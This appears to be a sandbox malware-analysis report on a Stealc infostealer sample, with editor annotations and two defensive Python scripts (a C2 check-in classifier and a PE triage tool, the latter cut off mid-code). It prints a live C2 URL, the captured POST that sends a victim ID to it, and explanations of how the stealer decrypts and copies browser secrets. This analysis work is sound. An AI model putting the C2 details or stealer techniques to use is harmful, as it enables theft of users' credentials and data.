

Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1521407
MD5: 5afadfe8ee15c31905dbd4fd8d0cc47d
SHA1: ad98ad6e22aa75fe869344932022507386c159aa
SHA256: fb8269dae16f59cb0f20bed8792e9a497e019b6d21c489114616f2c46d1db396
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 3808 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5AFADFE8EE15C31905DBD4FD8D0CC47D)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings whose development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Extracted malware configuration:
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Yara

Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.1743203944.000000000120E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1742561471.0000000000711000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.1702267630.00000000050B0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 3808 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 3808 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.710000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

Sigma

No Sigma rule has matched

Suricata

Timestamp: 2024-09-28T08:56:09.120222+0200
SID: 2044243
Severity: 1
Classtype: Malware Command and Control Activity Detected
Source: 192.168.2.4:49730
Destination: 185.215.113.37:80
Protocol: TCP


AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.710000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "save"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0071C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00717240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00719AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00719B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00728EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
(CryptUnprotectData is the DPAPI call that decrypts data protected under the logged-on user's credentials, which is how a stealer running as that user recovers browser-saved secrets; the CryptStringToBinaryA/CryptBinaryToStringA calls around it are the Base64 conversions, so the CryptStringToBinaryA then CryptUnprotectData sequence is consistent with decoding and decrypting a browser's DPAPI-wrapped key.)
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007238B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00724910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0071DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0071E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00724570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0071ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0071BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0071DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0071F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00723EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
(The repeated FindFirstFileA/FindNextFileA loops that StrCmpCA a name, PathMatchSpecA a pattern, CopyFileA the match and later DeleteFileA it are the collection routines: copying a file that another process holds open, reading the copy and deleting it is the usual way to get at locked browser databases, and it matches the file-by-file exfiltration described above.)

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.37
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /e2b1563c6670f193.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----FIIDBKJJDGHDHJKEHJDB
    Host: 185.215.113.37
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache

    ------FIIDBKJJDGHDHJKEHJDB
    Content-Disposition: form-data; name="hwid"

    9C4CF43424EB3294564547
    ------FIIDBKJJDGHDHJKEHJDB
    Content-Disposition: form-data; name="build"

    save
    ------FIIDBKJJDGHDHJKEHJDB--
    Data Raw: 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 43 34 43 46 34 33 34 32 34 45 42 33 32 39 34 35 36 34 35 34 37 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 44 42 4b 4a 4a 44 47 48 44 48 4a 4b 45 48 4a 44 42 2d 2d 0d 0a
(This is the check-in the Suricata rule fired on. Neither request carries a User-Agent header, the Host is the bare C2 IP rather than a name, and the "build" field, save, equals the Botnet value in the extracted configuration; the "hwid" field is the victim identifier the C2 keys its per-host tasking on. The same GET and POST were logged a second time in the report and are not repeated here.)
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (seven connections, all to the hard-coded C2 address)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00714880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: file.exe, 00000000.00000002.1743203944.000000000120E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1743203944.0000000001268000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1743203944.000000000120E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1743203944.0000000001268000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1743203944.0000000001268000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php)q
Source: file.exe, 00000000.00000002.1743203944.0000000001268000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php=qj
Source: file.exe, 00000000.00000002.1743203944.0000000001268000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpT
Source: file.exe, 00000000.00000002.1743203944.0000000001268000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.1743203944.000000000120E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37s
(The characters trailing ".php" and the final "s" in the last entries are adjacent heap bytes the string scanner ran into, not part of the URL; the two URLs that matter are the bare host and the .php gate.)
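The check-in above, parsed and scored as an added example. This is the editor's code, not Joe Sandbox's and not Stealc's: the request bytes are reconstructed from the report's rendering of the POST (the 211-byte body is rebuilt from its ASCII form), and the scoring heuristics (the hwid+build field set, a .php gate, no User-Agent, a bare-IP Host, the boundary shape) are derived from this single capture rather than from any vendor rule.

```python
"""Parse and classify the Stealc C2 check-in captured in this report.

Editor's added example, not Joe Sandbox or Stealc code. The request is
reconstructed from the report's rendering of the POST; the classification
heuristics (hwid+build field set, .php gate, no User-Agent, bare-IP Host,
boundary shape) are the editor's, derived from this single capture.
"""
import ipaddress
import re
from typing import Dict, List, Tuple

BOUNDARY = "----FIIDBKJJDGHDHJKEHJDB"   # from the captured Content-Type


def _part(name: str, value: bytes) -> bytes:
    """One multipart/form-data part, CRLF line endings as on the wire."""
    return (b"--" + BOUNDARY.encode() + b"\r\n"
            + b'Content-Disposition: form-data; name="' + name.encode()
            + b'"\r\n\r\n' + value + b"\r\n")


# Constructed from the report: the 211-byte body POSTed to
# http://185.215.113.37/e2b1563c6670f193.php (Content-Length: 211).
CAPTURED_BODY = (_part("hwid", b"9C4CF43424EB3294564547") + _part("build", b"save")
                 + b"--" + BOUNDARY.encode() + b"--\r\n")
CAPTURED_HEADERS = {            # note: no User-Agent, Host is a bare IP
    "Content-Type": "multipart/form-data; boundary=" + BOUNDARY,
    "Host": "185.215.113.37",
    "Content-Length": "211",
    "Connection": "Keep-Alive",
    "Cache-Control": "no-cache",
}
EXTRACTED_CONFIG = {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php",
                    "Botnet": "save"}     # as pulled by the report's extractor

_NAME_RE = re.compile(rb'name="([^"]*)"')
_BOUNDARY_RE = re.compile(r"boundary=([^;]+)")


def parse_multipart(body: bytes, boundary: str) -> Dict[str, bytes]:
    """Split a multipart/form-data body into {field name: raw value}.

    Minimal parsing for the flat bodies stealers send: parts are delimited by
    --boundary, each is header lines + blank line + value, and the closing
    delimiter ends in --. No nested multipart, no transfer encodings.
    """
    delim = b"--" + boundary.encode()
    fields: Dict[str, bytes] = {}
    for part in body.split(delim)[1:]:
        if part.startswith(b"--"):         # closing delimiter
            break
        if part.startswith(b"\r\n"):       # CRLF after the delimiter
            part = part[2:]
        head, sep, value = part.partition(b"\r\n\r\n")
        if not sep:
            continue                       # malformed part, skip it
        m = _NAME_RE.search(head)
        if m:
            # drop the CRLF that precedes the next delimiter
            fields[m.group(1).decode("latin-1")] = value[:-2] if value.endswith(b"\r\n") else value
    return fields


def _header(headers: Dict[str, str], name: str) -> str:
    """Case-insensitive header lookup; '' when absent."""
    return next((v for k, v in headers.items() if k.lower() == name.lower()), "")


def classify_checkin(method: str, path: str, headers: Dict[str, str],
                     body: bytes) -> Tuple[bool, List[str]]:
    """Return (looks_like_stealc_checkin, reasons).

    The verdict needs the hwid+build field set plus at least two of the other
    indicators, so a lone bare-IP POST or a lone UA-less upload does not fire.
    """
    reasons: List[str] = []
    ctype = _header(headers, "Content-Type")
    m = _BOUNDARY_RE.search(ctype)
    if method != "POST" or not ctype.startswith("multipart/form-data") or not m:
        return False, reasons
    boundary = m.group(1).strip()
    fields = parse_multipart(body, boundary)
    has_checkin_fields = set(fields) == {"hwid", "build"}
    if has_checkin_fields:
        reasons.append("body carries exactly the hwid and build fields")
    if path.lower().endswith(".php"):
        reasons.append("POST target is a .php gate")
    if not _header(headers, "User-Agent"):
        reasons.append("no User-Agent header")
    try:
        ipaddress.ip_address(_header(headers, "Host").split(":")[0])
        reasons.append("Host is a bare IP literal (no DNS lookup precedes it)")
    except ValueError:
        pass
    if re.fullmatch(r"-{4}[A-Z]{20}", boundary):   # editor's heuristic from this capture
        reasons.append("boundary is four dashes plus 20 uppercase letters")
    return has_checkin_fields and len(reasons) >= 3, reasons


def build_matches_config(fields: Dict[str, bytes], config: Dict[str, str]) -> bool:
    """True when the build field equals the Botnet value of the extracted config."""
    return fields.get("build", b"").decode("latin-1") == config.get("Botnet")


if __name__ == "__main__":
    verdict, why = classify_checkin("POST", "/e2b1563c6670f193.php",
                                    CAPTURED_HEADERS, CAPTURED_BODY)
    print(parse_multipart(CAPTURED_BODY, BOUNDARY), verdict, *why, sep="\n")
```

Run as a script it prints the two parsed fields, the verdict and the five reasons. Treat the boundary-shape heuristic as corroboration only: the report shows a single boundary, which is not enough to call the pattern Stealc-specific, and the verdict is gated on the field set for that reason.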

System Summary

Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: C:\Users\user\Desktop\file.exe | Code functions (no API names resolved): 0_2_00AD68B2, 0_2_00A508ED, 0_2_00A268E8, 0_2_00A840D8, 0_2_009E0015, 0_2_00AD1819, 0_2_00ACE86D, 0_2_0099D076, 0_2_00ADA05D, 0_2_00DA41D1, 0_2_009FF1EB, 0_2_00AE5940, 0_2_00A8B2E1, 0_2_00ADD30D, 0_2_00AD8375, 0_2_00ADF4B3, 0_2_00AC2404, 0_2_00AE2404, 0_2_009D5DDD, 0_2_00AF25FB, 0_2_009B4551, 0_2_00AE16A0, 0_2_00AE3E89, 0_2_00AD3F3D, 0_2_00ADBF3F
(These all sit above 0x990000, alongside the push/mov-obfuscated code and the RDTSC checks listed further down; the Stealc routines with resolved API chains are in the 0x710000 image, 0.2.file.exe.710000.0.unpack, whose first section the Yara rule matched at 0x711000 after it had been rewritten in memory.)
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 007145C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: shkwfujq ZLIB complexity 0.9949712233637747
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00729600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00723720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Q2IEG55W.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Sections loaded: apphelp.dll, winmm.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
(wininet.dll matches the InternetOpenA/HttpSendRequestA chain above. rstrtmgr.dll, the Restart Manager, is worth a second look in a stealer: it is the API used to find which processes hold a file open, which is how locked browser databases get released before they are copied.)
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1838080 > 1048576
Source: file.exe | Static PE information: Raw size of shkwfujq is bigger than: 0x100000 < 0x19aa00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.710000.0.unpack
    section rights in the memory dump: (unnamed):EW; .rsrc:W; .idata:W; (unnamed):EW; shkwfujq:EW; jdqxiqxa:EW; .taggant:EW
    section rights in the file on disk:  (unnamed):ER; .rsrc:W; .idata:W; (unnamed):EW; shkwfujq:EW; jdqxiqxa:EW; .taggant:EW
    (The first, unnamed section went from execute/read on disk to execute/write in memory, which is what the "Detected unpacking (changes PE section rights)" signature keys on; it is consistent with the stub writing the unpacked Stealc code into that section, where the Yara rule matched at 0x711000.)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00729860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1c417d should be: 0x1cf740
Source: file.exe | Static PE information: section names: (empty), .rsrc, .idata, (empty), shkwfujq, jdqxiqxa, .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00B760B5 push edi; mov dword ptr [esp], 03891EBAh (at 0_2_00B76112)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A3895 push ebp; mov dword ptr [esp], edx (at 0_2_009A3986)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A3895 push 69EEF532h; mov dword ptr [esp], ebx (at 0_2_009A3994)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push 51F89DF1h; mov dword ptr [esp], ebp (at 0_2_00AD68BB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push 2944B0E6h; mov dword ptr [esp], edx (at 0_2_00AD68C5)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push eax; mov dword ptr [esp], 3763B579h (at 0_2_00AD68CC)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push edx; mov dword ptr [esp], ebp (at 0_2_00AD69D2)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push 37A2822Eh; mov dword ptr [esp], edx (at 0_2_00AD69FA)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push esi; mov dword ptr [esp], 3812CEA0h (at 0_2_00AD6A0A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push eax; mov dword ptr [esp], 15ED7666h (at 0_2_00AD6A89)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push 2A894D8Fh; mov dword ptr [esp], ebp (at 0_2_00AD6A98)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push 642344FFh; mov dword ptr [esp], ecx (at 0_2_00AD6AAB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push 2CAC47BAh; mov dword ptr [esp], ebx (at 0_2_00AD6B1F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push 2F5BC7D1h; mov dword ptr [esp], ebx (at 0_2_00AD6B6A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push 42E5AECBh; mov dword ptr [esp], edx (at 0_2_00AD6B7F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push 17BD4128h; mov dword ptr [esp], eax (at 0_2_00AD6BA8)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push 550B5AB9h; mov dword ptr [esp], ecx (at 0_2_00AD6BDD)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push edi; mov dword ptr [esp], ebp (at 0_2_00AD6C71)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push esi; mov dword ptr [esp], edi (at 0_2_00AD6C75)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push ecx; mov dword ptr [esp], 7AFFBB96h (at 0_2_00AD6D2E)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push 0002B133h; mov dword ptr [esp], eax (at 0_2_00AD6D71)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push 1A802CBFh; mov dword ptr [esp], ecx (at 0_2_00AD6EF8)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push eax; mov dword ptr [esp], esi (at 0_2_00AD6EFE)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push 5765F700h; mov dword ptr [esp], edi (at 0_2_00AD6F1F)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push 20CD7CD2h; mov dword ptr [esp], eax (at 0_2_00AD6F3A)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push eax; mov dword ptr [esp], edi (at 0_2_00AD6F40)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push eax; mov dword ptr [esp], 25F14A6Ch (at 0_2_00AD6F46)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push 3E31160Bh; mov dword ptr [esp], edx (at 0_2_00AD6FD3)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push ecx; mov dword ptr [esp], ebp (at 0_2_00AD6FEE)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push ecx; mov dword ptr [esp], ebx (at 0_2_00AD700C)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AD68B2 push 5ED4BCE4h; mov dword ptr [esp], esi (at 0_2_00AD7142)
(Each "push X; mov dword ptr [esp], Y" pair is the obfuscated spelling of a plain "push Y": the first push reserves the slot, the mov overwrites it, and the pushed X is junk that defeats pattern matching on the immediate. This is the "Uses code obfuscation techniques (call, push, ret)" signature from the list above.)
Source: file.exe | Static PE information: section name: shkwfujq entropy: 7.954513336797254
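To reproduce the static findings in this section and under System Summary (the non-standard section names shkwfujq, jdqxiqxa and .taggant, the 7.95 entropy of shkwfujq, the entry point in .taggant, and the CheckSum mismatch) on a file of your own, the following is an added example, the editor's code rather than Joe Sandbox's. The sample itself is not on the page, so the block ships with a constructed minimal PE32 that is labelled as such; the CheckSum routine is the documented imagehlp algorithm, while the 7.0 entropy threshold and the list of "standard" section names are the editor's choices.

```python
"""Static PE triage for the findings above: non-standard section names,
per-section entropy, entry point outside a standard section, and the
optional-header CheckSum (report: real 0x1c417d, should be 0x1cf740).
Editor's added example, not Joe Sandbox code. The sample is not on the page,
so the demo runs on a constructed minimal PE32 from build_sample_pe(); pass
real file bytes to triage() instead. The CheckSum routine is the documented
algorithm; the 7.0 entropy threshold and the "standard" name list are the
editor's choices."""
import math
import struct
from collections import Counter
from typing import Dict, List, NamedTuple, Optional

STANDARD_SECTIONS = {".text", ".data", ".rdata", ".bss", ".idata", ".edata",
                     ".rsrc", ".reloc", ".tls", ".pdata", ".CRT", ".debug"}
HIGH_ENTROPY = 7.0      # packed or encrypted data sits close to 8.0 bits/byte

class Section(NamedTuple):
    name: str
    rva: int
    vsize: int
    raw_size: int
    entropy: float

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a uniform one."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """imagehlp-style CheckSum: carry-folded sum of little-endian dwords,
    skipping the CheckSum dword, folded to 16 bits, plus the file length."""
    padded = data + b"\0" * (-len(data) % 4)   # trailing bytes are zero-padded
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)

def parse_pe(data: bytes):
    """Return (optional header offset, AddressOfEntryPoint, sections)."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    nsect = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24                                   # optional header
    entry_rva = struct.unpack_from("<I", data, opt + 0x10)[0]
    sections: List[Section] = []
    for i in range(nsect):                                # 40-byte section headers
        name, vsize, rva, rsize, rptr = struct.unpack_from(
            "<8sIIII", data, opt + opt_size + 40 * i)
        sections.append(Section(name.rstrip(b"\0").decode("latin-1"), rva, vsize,
                                rsize, shannon_entropy(data[rptr:rptr + rsize])))
    return opt, entry_rva, sections

def section_containing(rva: int, sections: List[Section]) -> Optional[Section]:
    return next((s for s in sections
                 if s.rva <= rva < s.rva + max(s.vsize, s.raw_size)), None)

def triage(data: bytes) -> Dict[str, object]:
    opt, entry_rva, sections = parse_pe(data)
    stored = struct.unpack_from("<I", data, opt + 0x40)[0]
    computed = pe_checksum(data, opt + 0x40)
    ep = section_containing(entry_rva, sections)
    return {
        "sections": [(s.name, s.raw_size, round(s.entropy, 2)) for s in sections],
        "nonstandard_sections": [s.name for s in sections if s.name not in STANDARD_SECTIONS],
        "high_entropy_sections": [s.name for s in sections if s.entropy >= HIGH_ENTROPY],
        "entry_section": ep.name if ep else None,
        "entry_outside_standard": ep is None or ep.name not in STANDARD_SECTIONS,
        "checksum_stored": stored,
        "checksum_computed": computed,
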